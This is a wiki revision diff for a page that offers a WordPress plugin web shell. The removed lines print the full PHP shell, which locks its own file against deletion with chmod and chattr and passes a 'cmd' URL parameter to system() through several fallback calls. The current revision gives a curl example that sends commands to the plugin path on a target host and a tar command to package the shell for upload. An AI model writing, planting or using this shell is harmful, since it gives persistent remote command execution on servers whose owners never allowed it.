Difference between revisions of "WordPress Plugin - shell.php (variant 1)"

m
m
 
(6 intermediate revisions by the same user not shown)
Line 6: Line 6:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
<syntaxhighlight lang=php line>
+
Enough with intros so here's the code.   
<?php
+
{{#github:webshells/wp_shell1.php|blaksec/sectools|master|php|line=1|start=1}}
/**
 
* @package My_Shell
 
* @version 1.0
 
  */
 
/*
 
Plugin Name: BlakSec
 
Plugin URL: http://google.com
 
Description: A quick shell plugin
 
Author: ZeGnar
 
Version: 1.0
 
*/
 
 
 
# prevent file deletion
 
$myfile = __FILE__;
 
system("chmod ugo-w $myfile");
 
system("chattr +i $myfile");
 
$command=urldecode($_GET["cmd"]);
 
 
 
if (class_exists('ReflectionFunction')) {
 
$function = new ReflectionFunction('system');
 
$function->invoke($command);
 
} elseif (function_exists('call_user_func_array')) {
 
call_user_func_array('system', array($command));
 
} elseif (function_exists('call_user_func')) {
 
call_user_func('system', $command);
 
} else {
 
system($command);
 
}
 
?>
 
  
 +
Now just tar it up and it's ready to go
 +
<syntaxhighlight  lang=shell-session highlight="" line>
 +
tar -zcvf ./shell.tgz shell.php
 
</syntaxhighlight>
 
</syntaxhighlight>

Latest revision as of 21:42, 17 July 2018

The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.

E.g.

curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"

Enough with intros so here's the code.

Moved Permanently. Redirecting to https://cdn.jsdelivr.net/gh/blaksec/sectools@master/webshells/wp_shell1.php

Now just tar it up and it's ready to go

tar -zcvf ./shell.tgz shell.php